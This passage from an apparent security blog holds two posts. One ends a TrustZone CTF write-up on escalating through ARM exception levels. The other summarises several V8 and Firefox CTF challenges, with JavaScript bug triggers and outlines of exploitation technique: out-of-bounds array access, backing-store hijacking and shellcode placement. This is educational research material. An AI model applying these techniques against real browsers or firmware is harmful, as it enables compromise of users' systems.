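        size -= 0x1000
    return out

# the second page of this request wraps around to physical address 0
assert mapped_pages(0xFFFFF000, 0x2000) == [0xFFFFF000, 0x0]
```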
<p>Taking a step back, it’s likely that any S-EL1 bugs would be present in a syscall, or at least require the use of a syscall. This would require players to pwn S-EL0 first, which makes sense from the standpoint of the CTF. One interesting syscall is <code class="highlighter-rouge">signal</code>, which allows the trusted application to define a signal handler. The HITCON blob uses this to catch errors and populate the user’s buffer with an error code and string.</p>
<pre><code class="language-cpp=">signed int sel1_set_signal_handler(int a1, unsigned int a2)
{
if ( a2 < 0x2400000 && a1 == 11 )
sel0_sighandler_addr = a2;
return -1;
}
</code></pre>
<p>S-EL1 stores the user’s argument in a global in its memory. Whenever a data or prefetch abort occurs, execution flows to <code class="highlighter-rouge">sel1_handle_signal</code> to check for the presence of a defined handler. That function will determine whether the handler is thumb or arm mode (checking the bottom bit) and populate state accordingly.</p>
<pre><code class="language-arm">0x08001588 sel1_data_abort
0x08001588 STR LR, [SP,#0x3C] ; Store to Memory
0x0800158C MRS LR, SPSR ; Transfer PSR to Register ; <---- [A]
0x08001590 STR LR, [SP,#0x40] ; Store to Memory
0x08001594 CPS #0x13 ; Change Processor State
0x08001598 BL sel1_save_regs ; Branch with Link
0x0800159C ---------------------------------------------------------------------------
0x0800159C LDR R8, [SP,#0x44] ; Load from Memory
0x080015A0 CPS #0x1F ; Change Processor State
0x080015A4 MOV SP, R8 ; Rd = Op2
0x080015A8 MOV R0, #0x17 ; Rd = Op2
0x080015AC BLX sel1_handle_signal ; Change stored pc to saved handler
0x080015B0 B sel1_return_from_interrupt
0x0800187C sel1_return_from_interrupt
0x0800187C CPS #0x13 ; Change Processor State
0x08001880 LDR R0, [SP,#arg_40] ; Load from Memory
0x08001884 MSR SPSR_cxsf, R0 ; Transfer Register to PSR ; <---- [B]
0x08001888 B loc_8001870
0x08001870 BL sel1_restore_regs
0x08001874 LDR LR, [SP,#0x3C] ; Load from Memory
0x08001878 MOVS PC, LR ; Rd = Op2
</code></pre>
<p><code class="highlighter-rouge">sel1_handle_signal</code> is primarily responsible for overwriting the saved PC value. Though this is a data abort handler, it looks very similar to a syscall handler, and reuses much of that code. However, data aborts can occur in either S-EL0 or S-EL1. At point A, the handler saves the existing SPSR value, which records the exception level the abort was taken from, onto the stack. Later, at point B, it unconditionally restores that saved state! The path duplicated from the syscall handler didn’t account for the fact that while a syscall handled in S-EL1 returns to EL3, a data abort taken in S-EL1 still returns to S-EL1.</p>
<p>In other words, if we define a signal handler in S-EL0 then trigger a data abort in S-EL1, we’ll execute our shellcode with S-EL1’s exception level.</p>
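<p>A toy state model of the abort path (points A and B above) makes the escalation clear; the saved exception level is the only state that matters here:</p>

```python
def take_data_abort(current_el, user_handler):
    # [A] MRS LR, SPSR: stash SPSR, which records the EL the abort came from
    saved_spsr_el = current_el
    # sel1_handle_signal swaps the saved PC for the registered handler
    saved_pc = user_handler
    # [B] MSR SPSR / MOVS PC, LR: restore both values unconditionally
    return saved_pc, saved_spsr_el

pc, el = take_data_abort(current_el=1, user_handler=0x2001)
assert (pc, el) == (0x2001, 1)  # user-chosen PC resumes at S-EL1
```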
<h3 id="el3-escaping-the-matrix">EL3: Escaping the matrix</h3>
<p>EL3 is the final frontier for our challenge. At this point I’d done a reasonable amount of reversing on it already to determine where other exception levels were mapped and how securecalls are passed back and forth through the secure monitor code. After performing system setup, the actual core of EL3 is very small, mainly serving as a secure monitor that shuttles calls between normal and secure worlds. To this end, S-EL1 is capable of pointing its TTEs at EL3 pages to get an accessible mapping. However, the EL3 code executes directly off the read-only VIRT_FLASH pages, so we cannot write to its code pages directly.</p>
<p>Let’s examine code responsible for shuttling a secure call between worlds, in pursuit of a suitable write target.</p>
<pre><code class="language-cpp=63">if ( cmd != 0x83000007 )
{
sub_D28();
sub_310();
}
el3_switch_world(0);
retvalptr = el3_get_world_scratch(1u);
el3_set_current_world(1u);
el3_set_el1_sp(1u);
*retvalptr = v9;
result = retvalptr;
</code></pre>
<p>This code is responsible for returning to Normal World with an error code. It retrieves a pointer to the Normal World’s (id 1) saved execution state, then overwrites the stored <code class="highlighter-rouge">x0</code> register value. It also transitions back to Normal World before returning.</p>
<pre><code class="language-cpp=">QWORD * el3_get_world_scratch(unsigned int a1)
{
return *(_QWORD **)(0xE002410 + 8i64 * a1);
}
</code></pre>
<p>As we can see, the scratch buffers are stored as the first two qwords in an array at <code class="highlighter-rouge">0xE002410</code>. This page is within the VIRT_SECURE_MEM physical page range, so we can point to it in our S-EL1 TTE to read and write its contents. If we write a pointer to <code class="highlighter-rouge">0xE002418</code>, we obtain an arbitrary write by returning a 64-bit value from Secure World. ASLR isn’t enabled on the EL3 stack, so it’s easy enough to clobber the saved return address and jump directly to our shellcode payload running in EL3.</p>
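<p>Modeling that return path with a dict standing in for memory (the target address is illustrative):</p>

```python
MEM = {0xE002410: 0xAAAA0000, 0xE002418: 0xBBBB0000}  # per-world scratch ptrs

def el3_get_world_scratch(world):
    return MEM[0xE002410 + 8 * world]

def el3_return_with_value(retval):
    # EL3 blindly stores the secure call's return value through the pointer
    MEM[el3_get_world_scratch(1)] = retval

MEM[0xE002418] = 0x41414100      # our S-EL1 write plants a target address
el3_return_with_value(0x1337)    # returning from secure world then...
assert MEM[0x41414100] == 0x1337 # ...writes a controlled value anywhere
```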
<h3 id="parting-thoughts">Parting Thoughts</h3>
<p>Over the past several years, CTFs have become increasingly involved and reflective of real world vulnerability research. CTF is a common route for new talent to break into the industry, and for professionals to use their skills in competition. Challenges are often written based on inspiration from bugs the authors have seen elsewhere, and Super Hexagon definitely felt that way to me.</p>
<p>HITCON is always one of the top CTFs of the year, and 2018 did not disappoint. The organizers had forgone having a final that year and so the challenges during the online event were all difficult and novel. I would consider it one of my favorite events of the year, and based on recent updates to their website, it appears that HITCON 2019 will be taking place. I’d encourage anyone who has made it this far to participate.</p>
<p>Until then, you can find my full solution scripts and notes for Super Hexagon on my Github <a href="https://github.com/nafod/super-hexagon">here</a>.</p>
<h3 id="other-writeups">Other Writeups</h3>
<p><a href="https://hernan.de/blog/2018/10/30/super-hexagon-a-journey-from-el0-to-s-el3/">Super Hexagon: A Journey from EL0 to S-EL3, by Grant Hernandez (Kernel Sanders)</a></p>
<p><a href="https://github.com/pwning/public-writeup/blob/master/hitcon2018/super_hexagon/README.md">PPP’s writeup</a></p>
<p><a href="https://github.com/balsn/ctf_writeup/tree/master/20181019-hitconctf#super-hexagon">Balsn’s writeup</a></p>
advent-browserpwn 2018 (2019-02-13) https://nafod.net/blog/2019/02/13/advent-browserpwn-2018
<p>Last December (2018), I created an advent calendar on the Japanese site <a href="https://adventar.org">adventar.org</a> after seeing some Japanese CTFers creating a PWN-focused calendar there.</p>
<p>You can find it here: <a href="https://adventar.org/calendars/3435">https://adventar.org/calendars/3435</a></p>
<p>The general theme of my calendar was focused around solving browser pwnables from recent CTFs, with a strong focus on V8. I tried to arrange the challenges in such a way that the learning curve would be reasonable and to give myself enough time to solve them. Things got even better when <a href="http://35c3ctf.ccc.ac">35C3CTF</a>, which took place right near the end of December, featured a fun V8 challenge that I added to the list. Overall, I finished the last challenge sometime around the last week of January 2019.</p>
<p>Below I’ll briefly discuss each problem I completed. Many of these have been discussed in depth elsewhere on the internet, so I’ll try to keep my contributions short and focus on general thoughts. I freely admit this is not a tutorial post, but more of a summary of my calendar.</p>
<p>Warning, spoilers follow. If you are just interested in solve scripts, check the bottom of the post.</p>
<h3 id="blazefox-blazectf-2018">“Blazefox” (BlazeCTF 2018)</h3>
<p>BlazeFox was the sole non-V8 challenge on this list. It involved a straightforward method added onto the Array class that would directly set the underlying length field to 420. Since obtaining corrupted length fields on an array is sort of the end state that browser exploits coalesce to, it was a great starting point for me to understand the underlying fundamentals (properties? elements? inline-elements? maps? backing stores?). 0vercl0k just published <a href="https://doar-e.github.io/blog/2018/11/19/introduction-to-spidermonkey-exploitation/">a great blogpost</a> on this challenge, so I’ll not discuss it too much here.</p>
<p>My strategy for browser bugs of this category (those that lead to a corrupted length field) is to use the corrupted array to directly manipulate an adjacent victim ArrayBuffer. ArrayBuffer objects usually consist of little more than a “backing store” pointer to a raw data buffer and a length field. By manipulating the backing store, we obtain an arbitrary read/write memory primitive from our weaker relative read/write. From there, I used the same method as described in <a href="https://phoenhex.re/2017-06-21/firefox-structuredclone-refleak">this phoenhex article</a> to overwrite a GOT entry in libxul.</p>
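<p>To turn that relative read/write into the arbitrary primitives above, exploits constantly reinterpret the doubles a float array yields as raw 64-bit pointers and back. A minimal, runnable sketch of the usual conversion helpers (the <code>ftoi</code>/<code>itof</code> names are exploit-writing convention, not anything from the challenge itself):</p>

```javascript
// One 8-byte buffer viewed as both a float64 and a uint64, so
// writing through one view and reading the other type-puns the bits.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

// double -> 64-bit integer (e.g. turn a leaked float into a pointer)
function ftoi(f) {
  f64[0] = f;
  return u64[0];
}

// 64-bit integer -> double (e.g. write a pointer through a float array)
function itof(i) {
  u64[0] = i;
  return f64[0];
}
```

<p>A backing-store pointer leaked through the corrupted array as a double can then be converted with <code>ftoi</code>, adjusted, and written back with <code>itof</code>.</p>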
<h3 id="v8-challenge-csaw-2018-finals">V8 Challenge (CSAW 2018 Finals)</h3>
<p>Unlike Blazefox, this challenge doesn’t directly hand us a bug. Rather, it defines a new interpreter method <code class="highlighter-rouge">Array.prototype.replaceIf(index, callbackfn, replacement)</code> as a builtin, giving us a chance to do some small-scale bughunting. In this case, the bug is related to proxies and a lack of state-flushing after allowing Javascript execution to occur. Javascript proxies are objects that let us override normal object behavior for common operations (getter/setter/method calls), and can be a common source of bugs for code expecting default behavior. We can define a handler to override certain property accessors to fake out the length field when it is requested.</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">handler</span> <span class="o">=</span> <span class="p">{</span>
<span class="na">get</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">obj</span><span class="p">,</span> <span class="nx">prop</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">prop</span> <span class="o">==</span> <span class="dl">'</span><span class="s1">length</span><span class="dl">'</span><span class="p">)</span>
<span class="k">return</span> <span class="mh">0x1337</span><span class="p">;</span>
<span class="k">else</span>
<span class="k">return</span> <span class="nx">obj</span><span class="p">[</span><span class="nx">prop</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="k">new</span> <span class="nb">Proxy</span><span class="p">(</span><span class="k">new</span> <span class="nb">Array</span><span class="p">(</span><span class="mh">0x8</span><span class="p">),</span> <span class="nx">handler</span><span class="p">).</span><span class="nx">replaceIf</span><span class="p">(</span><span class="nx">idx</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">elem</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="nx">idx</span> <span class="o">==</span> <span class="mh">0x33</span><span class="p">);</span> <span class="c1">// index we want to overwrite</span>
<span class="p">},</span> <span class="mh">0x13370000</span><span class="p">);</span>
</code></pre></div></div>
<p>Now, we can use the <code class="highlighter-rouge">replaceIf</code> function to read and write OOB from our array. At this point, the next few exploit steps are similar to Blazefox: find our victim ArrayBuffer, grab its backing store, construct our <code class="highlighter-rouge">r64()/w64()</code> functions, etc. How do we get PC control? As of 2018, V8 ships without RWX pages in the renderer process by default. However, this challenge turns that protection back off for us, so we can walk class/structure offsets to reach the RWX page backing a JSFunction and simply write our shellcode there.</p>
<h3 id="roll-a-d8-plaidctf-2018">“Roll a d8” (PlaidCTF 2018)</h3>
<p>This challenge was the first n-day challenge of the calendar, targeting crbug 821137. Players were given just a V8 version and the following regression test:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Copyright 2018 the V8 project authors. All rights reserved.</span>
<span class="c1">// Use of this source code is governed by a BSD-style license that can be</span>
<span class="c1">// found in the LICENSE file.</span>
<span class="c1">// Tests that creating an iterator that shrinks the array populated by</span>
<span class="c1">// Array.from does not lead to out of bounds writes.</span>
<span class="kd">let</span> <span class="nx">oobArray</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">let</span> <span class="nx">maxSize</span> <span class="o">=</span> <span class="mi">1028</span> <span class="o">*</span> <span class="mi">8</span><span class="p">;</span>
<span class="nb">Array</span><span class="p">.</span><span class="k">from</span><span class="p">.</span><span class="nx">call</span><span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">oobArray</span> <span class="p">},</span> <span class="p">{[</span><span class="nb">Symbol</span><span class="p">.</span><span class="nx">iterator</span><span class="p">]</span> <span class="p">:</span> <span class="nx">_</span> <span class="o">=></span> <span class="p">(</span>
<span class="p">{</span>
<span class="na">counter</span> <span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="nx">next</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">counter</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">counter</span> <span class="o">></span> <span class="nx">maxSize</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">oobArray</span><span class="p">.</span><span class="nx">length</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">return</span> <span class="p">{</span><span class="na">done</span><span class="p">:</span> <span class="kc">true</span><span class="p">};</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span><span class="na">value</span><span class="p">:</span> <span class="nx">result</span><span class="p">,</span> <span class="na">done</span><span class="p">:</span> <span class="kc">false</span><span class="p">};</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">)</span> <span class="p">});</span>
<span class="nx">assertEquals</span><span class="p">(</span><span class="nx">oobArray</span><span class="p">.</span><span class="nx">length</span><span class="p">,</span> <span class="nx">maxSize</span><span class="p">);</span>
<span class="c1">// iterator reset the length to 0 just before returning done, so this will crash</span>
<span class="c1">// if the backing store was not resized correctly.</span>
<span class="nx">oobArray</span><span class="p">[</span><span class="nx">oobArray</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x41414141</span><span class="p">;</span>
</code></pre></div></div>
<p>Thanks to the comments, the bug is pretty obvious. Shrinking the array you are iterating over, in the iterator callback function, incorrectly changes the array length without resizing the backing store. There really wasn’t a lot different happening here than before - we can see the pattern already. Corrupt array length -> overwrite victim -> clobber function code pointer -> shellcode. Besides implementing the weaponization again, the main difference was getting used to the Chromium project’s bug-reporting and regression system.</p>
<h3 id="v9-34c3ctf">“V9” (34C3CTF)</h3>
<p>V9 represented a completely different direction from the previous browser challenges. It required an understanding of Chrome’s Turbofan JIT subsystem. This was an interesting opportunity to approach JIT bugs because the provided patchfile was quite small:</p>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">@@</span> <span class="o">-</span><span class="mi">26</span><span class="p">,</span><span class="mi">6</span> <span class="o">+</span><span class="mi">26</span><span class="p">,</span><span class="mi">7</span> <span class="err">@@</span> <span class="n">Reduction</span> <span class="n">RedundancyElimination</span><span class="o">::</span><span class="n">Reduce</span><span class="p">(</span><span class="n">Node</span><span class="o">*</span> <span class="n">node</span><span class="p">)</span> <span class="p">{</span>
<span class="err">@@</span> <span class="o">-</span><span class="mi">167</span><span class="p">,</span><span class="mi">6</span> <span class="o">+</span><span class="mi">168</span><span class="p">,</span><span class="mi">15</span> <span class="err">@@</span> <span class="kt">bool</span> <span class="n">CheckSubsumes</span><span class="p">(</span><span class="n">Node</span> <span class="k">const</span><span class="o">*</span> <span class="n">a</span><span class="p">,</span> <span class="n">Node</span> <span class="k">const</span><span class="o">*</span> <span class="n">b</span><span class="p">)</span> <span class="p">{</span>
<span class="p">}</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">+</span> <span class="k">case</span> <span class="n">IrOpcode</span><span class="p">:</span><span class="o">:</span><span class="n">kCheckMaps</span><span class="o">:</span> <span class="p">{</span>
<span class="o">+</span> <span class="c1">// CheckMaps are compatible if the first checks a subset of the second.</span>
<span class="o">+</span> <span class="n">ZoneHandleSet</span><span class="o"><</span><span class="n">Map</span><span class="o">></span> <span class="k">const</span><span class="o">&</span> <span class="n">a_maps</span> <span class="o">=</span> <span class="n">CheckMapsParametersOf</span><span class="p">(</span><span class="n">a</span><span class="o">-></span><span class="n">op</span><span class="p">()).</span><span class="n">maps</span><span class="p">();</span>
<span class="o">+</span> <span class="n">ZoneHandleSet</span><span class="o"><</span><span class="n">Map</span><span class="o">></span> <span class="k">const</span><span class="o">&</span> <span class="n">b_maps</span> <span class="o">=</span> <span class="n">CheckMapsParametersOf</span><span class="p">(</span><span class="n">b</span><span class="o">-></span><span class="n">op</span><span class="p">()).</span><span class="n">maps</span><span class="p">();</span>
<span class="o">+</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">b_maps</span><span class="p">.</span><span class="n">contains</span><span class="p">(</span><span class="n">a_maps</span><span class="p">))</span> <span class="p">{</span>
<span class="o">+</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="o">+</span> <span class="p">}</span>
<span class="o">+</span> <span class="k">break</span><span class="p">;</span>
<span class="o">+</span> <span class="p">}</span>
</code></pre></div></div>
<p>The challenge adds a new opcode to the list of those removed by RedundancyElimination, which is a JIT pass responsible for removing redundant nodes in the sea-of-nodes representation. The pass itself is invoked during the “early optimization” and “load elimination” phases of the <a href="https://cs.chromium.org/chromium/src/v8/src/compiler/pipeline.cc">Turbofan pipeline</a>. We can visualize all Turbofan passes and node graphs using the <a href="https://github.com/thlorenz/turbolizer">Turbolizer</a> tool, also available in V8’s git repo. In this case, the added opcode removes a CheckMaps node if one child’s map is strictly a subset of the second. You can imagine that situation occurring with code like this:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">x</span> <span class="o">=</span> <span class="p">[</span><span class="mf">1.1</span><span class="p">,</span> <span class="mf">2.2</span><span class="p">,</span> <span class="mf">3.3</span><span class="p">,</span> <span class="mf">4.4</span><span class="p">];</span>
<span class="nx">x</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mf">5.5</span><span class="p">;</span> <span class="c1">// [A]</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">x</span><span class="p">);</span>
<span class="nx">x</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mf">6.6</span><span class="p">;</span> <span class="c1">// [B]</span>
</code></pre></div></div>
<p>At <code class="highlighter-rouge">[A]</code> and <code class="highlighter-rouge">[B]</code>, a <code class="highlighter-rouge">CheckMaps</code> is emitted to ensure that the <code class="highlighter-rouge">console.log(x)</code> call has not transitioned x’s underlying element map. Such a node might be emitted as a protection against an object changing from <code class="highlighter-rouge">PACKED_DOUBLE_ELEMENTS</code> to <code class="highlighter-rouge">DICTIONARY_MODE</code>, for example. However, the added <code class="highlighter-rouge">Reduce()</code> case is unsound: arbitrary JavaScript can run between the two checks, so the second <code class="highlighter-rouge">CheckMaps</code> cannot safely be eliminated; <code class="highlighter-rouge">x</code> transitions in the meantime and the emitted fast-access code operates on the wrong layout. The following code will transition an Array in exactly that way (packed -> dictionary) resulting in OOB access:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">x</span> <span class="o">=</span> <span class="p">[</span><span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.1</span><span class="p">,</span> <span class="mf">1.1</span><span class="p">];</span> <span class="c1">// declare a PACKED_DOUBLE_ELEMENTS</span>
<span class="nx">x</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="mf">1.1</span><span class="p">;</span> <span class="c1">// inlined StoreElement, protected by CheckMaps</span>
<span class="nx">x</span><span class="p">.</span><span class="nx">length</span> <span class="o">=</span> <span class="mh">0x7f0000</span><span class="p">;</span> <span class="c1">// transition to DICTIONARY_MODE</span>
<span class="c1">// At this point, x is of type DICTIONARY_ELEMENTS, but the JIT thinks it is PACKED</span>
<span class="c1">// The following inlined StoreElement will incorrectly offset from the array, rather than</span>
<span class="c1">// resolving the lookup through the elements pointer</span>
<span class="nx">x</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="nx">val</span><span class="p">;</span>
</code></pre></div></div>
<h3 id="krautflare-35c3ctf">“krautflare” (35C3CTF)</h3>
<p>Much has been written about krautflare elsewhere online, including some excellent writeups (<a href="https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/">here</a> and <a href="https://www.jaybosamiya.com/blog/2019/01/02/krautflare/">here</a>). The key problem in this challenge is how to delay optimization in V8 until the <code class="highlighter-rouge">ConstantFoldingReducer</code> will no longer be invoked. Doing so prevents the typing bug, which could be induced to appear in an early typing stage, from being optimized out before it can be used to generate buggy code. In theory, the answer is straightforward - prevent V8 from performing type analysis until a later pass has removed some intermediate construct. One such example, which I and others used, involves forcing a delay until <a href="https://www.jfokus.se/jfokus18/preso/Escape-Analysis-in-V8.pdf">escape analysis</a>:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">diagonal</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">abs</span><span class="p">({</span><span class="na">x</span><span class="p">:</span><span class="nx">a</span><span class="p">,</span> <span class="na">y</span><span class="p">:</span><span class="nx">a</span><span class="p">});</span>
<span class="p">}</span>
<span class="c1">// After Escape Analysis...</span>
<span class="kd">function</span> <span class="nx">diagonal</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">sqrt</span><span class="p">(</span><span class="nx">a</span><span class="o">*</span><span class="nx">a</span> <span class="o">+</span> <span class="nx">a</span><span class="o">*</span><span class="nx">a</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>I didn’t solve this challenge during the competition. I knew I had to wait until escape analysis to prevent early optimization, but was having trouble triggering it during the CTF. In the end, through a combination of child functions and hiding arguments I got it to work - as an OOB write. For some reason, Turbofan was not removing the CheckBounds on my OOB read attempts, which I think may be related to a <code class="highlighter-rouge">Load</code> node not being inlined, whereas the <code class="highlighter-rouge">StoreElement</code> node was lowered to remove its internal bounds check.</p>
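<p>The signed-zero semantics at the heart of krautflare are easy to sanity-check from any JavaScript shell; the challenge’s patched typer (per the writeups linked above) claimed <code>Math.expm1</code> could never return <code>-0</code>, while the language says otherwise:</p>

```javascript
// Object.is distinguishes -0 from +0, unlike the === comparison.
console.log(0 === -0);                      // true
console.log(Object.is(0, -0));              // false

// Math.expm1(-0) really does return -0, contradicting a typer
// that types its result as a plain number excluding -0.
console.log(Object.is(Math.expm1(-0), -0)); // true
console.log(Object.is(Math.expm1(0), 0));   // true
```

<p>That disagreement between the typer and reality is the seed the exploit keeps alive until the JIT emits code based on the wrong type.</p>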
<p>One interesting thing to note is that constructions involving escaping object properties, like the following:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">x</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="p">{</span><span class="na">a</span><span class="p">:</span> <span class="mi">1</span><span class="p">}.</span><span class="nx">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">y</span> <span class="o">=</span> <span class="nx">x</span><span class="p">();</span>
</code></pre></div></div>
<p>…seem to be optimized during the “load elimination” stage if possible, right before “escape analysis”. Sufficient complexity or child functions will prevent that from happening. This means that contrary to the name of the phase, simple objects will undergo escape analysis optimization prior to the formal “escape analysis phase.” It’s also possible to prevent the “load elimination” phase from optimizing it by including a large number of class members (see <code class="highlighter-rouge">kMaxTrackedFields</code>, currently 32), which <a href="https://twitter.com/_tsuro">_tsuro</a> utilized in his reference solution.</p>
<h3 id="just-in-time-googlectf-finals-2018">“Just-in-time” (GoogleCTF Finals 2018)</h3>
<p>This challenge adds a small <code class="highlighter-rouge">Reducer</code> to the V8 pipeline, which is basically just a phase (like “dead code elimination”, or “load elimination” as we discussed above). The added buggy <code class="highlighter-rouge">DuplicateAdditionReducer</code> combines JSNumber operations with constant double values at JIT compile time. For example, expressions of the form <code class="highlighter-rouge">1.1 + (2.2 + 3.3)</code> would be converted to <code class="highlighter-rouge">1.1 + 5.5</code>. The combination was done by pulling out the underlying <code class="highlighter-rouge">double</code> value and adding them with C++ floating-point semantics. Unfortunately, that doesn’t quite match JSNumber addition semantics. While most people online abused the fact that <code class="highlighter-rouge">Number.MAX_SAFE_INTEGER + 1 === Number.MAX_SAFE_INTEGER + 2</code>, solving krautflare right before this made me think of</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span><span class="kc">Infinity</span> <span class="o">+</span> <span class="nb">Number</span><span class="p">.</span><span class="nx">MAX_VALUE</span> <span class="o">+</span> <span class="nb">Number</span><span class="p">.</span><span class="nx">MAX_VALUE</span> <span class="o">==</span> <span class="o">-</span><span class="kc">Infinity</span>
</code></pre></div></div>
<p>which is correct. However, the <code class="highlighter-rouge">DuplicateAdditionReducer</code> combines the two into</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">-</span><span class="kc">Infinity</span> <span class="o">+</span> <span class="kc">Infinity</span> <span class="o">==</span> <span class="kc">NaN</span>
</code></pre></div></div>
<p>which creates an observable typing bug. Afterwards, the problem actually reduces to that of krautflare, just substituting <code class="highlighter-rouge">Object.is(..., -0)</code> with <code class="highlighter-rouge">Object.is(..., NaN)</code>. In fact, my final buggy JITted function for this challenge is almost identical to my krautflare solution.</p>
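<p>The mismatch between the two evaluation orders is observable in any shell, no JIT required: left-to-right addition keeps the <code>-Infinity</code>, while folding the two constants first overflows to <code>+Infinity</code> and then <code>NaN</code>:</p>

```javascript
const M = Number.MAX_VALUE;

// Interpreter semantics: strict left-to-right addition.
const correct = -Infinity + M + M;   // (-Inf + M) + M stays -Inf
console.log(correct);                // -Infinity

// What DuplicateAdditionReducer effectively computes: the two
// constant operands are folded first, overflowing to +Infinity.
const folded = -Infinity + (M + M);  // -Inf + Inf
console.log(folded);                 // NaN
```

<p>The JITted code thus produces <code>NaN</code> where the typer proved the result could only be <code>-Infinity</code>, giving the same kind of exploitable type confusion as krautflare.</p>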
<p>If you’re interested in reading more about this challenge, __x86 has a great post that dives deep into it <a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/">here</a>.</p>
<h3 id="mr-mojo-rising-googlectf-finals-2018">“Mr. Mojo Rising” (GoogleCTF Finals 2018)</h3>
<p>After completing a series of renderer bugs, it seemed fitting to throw in at least one SBX challenge. This was a P0-discovered n-day bug that allowed for relative r/w off of Mojo datapipes, which are basically mmap’d shared-memory regions. The Mojo documentation is pretty sparse and I ended up having to spend a decent amount of time fiddling with ServiceWorkers to get things to play nice with headless chrome. Eventually, I was able to trigger the primitives and write straightline exploit code with <code class="highlighter-rouge">await</code>. Ultimately, this was my most brittle exploit - it’s heavily offset + allocation order dependent. I abuse the predictable ordering of mmap allocations to overwrite a function in libc’s GOT to point to the magic gadget, a classic CTF trick.</p>
<p>All that work for this, <a href="https://asciinema.org/a/7SqpxsaqlwqvMmydvBOkSI6Mp">an asciinema of it landing</a>.</p>
<h2 id="parting-thoughts">Parting Thoughts</h2>
<p>I had a lot of fun completing the above challenges and will definitely continue working on browser exploitation. While I’m not sure how I feel about the recent trend of “weaponize-nday-as-a-challenge” in CTF, the problems provide clean environments for weaponizing bugs, with attention centered on browser internals rather than the environmental factors that might otherwise complicate things. At the very least, it’s definitely good practice!</p>
<p>You can find all my solution scripts (as well as collected challenge readmes+patchfiles) <a href="http://github.com/nafod/advent-browserpwn">here</a>.</p>